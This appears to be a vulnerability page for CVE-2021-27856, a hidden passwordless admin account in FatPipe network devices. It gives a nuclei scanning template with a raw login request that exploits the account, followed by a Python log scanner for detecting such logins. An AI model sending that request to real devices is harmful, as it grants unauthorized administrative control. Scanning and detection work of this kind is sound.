FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access. Exploitation requires no authentication.
PoC code [public]
id: CVE-2021-27856

info:
  name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account
  author: gy741
  severity: critical
  description: |
    FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
    - https://www.fatpipeinc.com/support/advisories.php
    - https://www.fatpipeinc.com/support/cve-list.php
    - https://www.zeroscience.mk/codes/fatpipe_backdoor.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27856
    cwe-id: NVD-CWE-Other
    epss-score: 0.60793
    epss-percentile: 0.98205
    cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fatpipeinc
    product: warp_firmware
  tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln

http:
  - raw:
      - |
        POST /fpui/loginServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - '"loginRes":"success"'
          - '"activeUserName":"cmuser"'
        condition: and
# digest: 4a0a00473045022017f3705ef32adbd67b7ab6747446f80d108b409122070e0e76dd9a910bd3a36b022100ab836bff77323e466928428a7162b947251de83360d4e8baf8805c881f8b9e23:922c64590222798bb761d5b6d8e72950
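
A defensive counterpart to the template above, as an added example that is not part of the original page or the nuclei project: it scans logged HTTP exchanges for logins to /fpui/loginServlet as cmuser and separates attempts from successes. The record layout, function names and sample records are constructed for illustration, and the case-insensitive username match is a conservative assumption.

```python
import json
from urllib.parse import parse_qs

LOGIN_PATH = "/fpui/loginServlet"  # endpoint taken from the template
BACKDOOR_USER = "cmuser"           # account named in the advisory
# Success markers, identical to the template's word matcher
SUCCESS_MARKERS = ('"loginRes":"success"', '"activeUserName":"cmuser"')

def classify(method, path, req_body, resp_body=""):
    """Return None, 'attempt' or 'success' for one logged HTTP exchange."""
    if method.upper() != "POST" or path.split("?", 1)[0] != LOGIN_PATH:
        return None
    # parse_qs URL-decodes values; keep_blank_values keeps empty fields
    for value in parse_qs(req_body, keep_blank_values=True).get("loginParams", []):
        try:
            params = json.loads(value)
        except ValueError:  # malformed JSON in loginParams
            continue
        if not isinstance(params, dict):
            continue
        # Case-insensitive match is a conservative assumption, not vendor-documented
        if str(params.get("username", "")).strip().lower() != BACKDOOR_USER:
            continue
        if all(marker in resp_body for marker in SUCCESS_MARKERS):
            return "success"
        return "attempt"
    return None

def scan(records):
    """Return (source, verdict) for every record that touches the account."""
    hits = []
    for rec in records:
        verdict = classify(rec["method"], rec["path"], rec["body"], rec.get("resp", ""))
        if verdict:
            hits.append((rec["src"], verdict))
    return hits

# Constructed sample records (documentation IP ranges, abbreviated responses)
CMUSER_BODY = "loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D"
SAMPLES = [
    {"src": "198.51.100.7", "method": "POST", "path": LOGIN_PATH, "body": CMUSER_BODY,
     "resp": '{"loginRes":"success","activeUserName":"cmuser"}'},
    {"src": "203.0.113.9", "method": "POST", "path": LOGIN_PATH, "body": CMUSER_BODY,
     "resp": '{"loginRes":"fail"}'},
    {"src": "192.0.2.4", "method": "POST", "path": LOGIN_PATH,
     "body": "loginParams=%7B%22username%22%3A%22admin%22%2C%22password%22%3A%22x%22%2C%22authType%22%3A0%7D"},
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLES):
        print(f"{src}: cmuser login {verdict}")
```

A "success" verdict means the device accepted the account and should be treated as compromised until upgraded to a fixed version; an "attempt" against a fixed device still indicates scanning for this CVE.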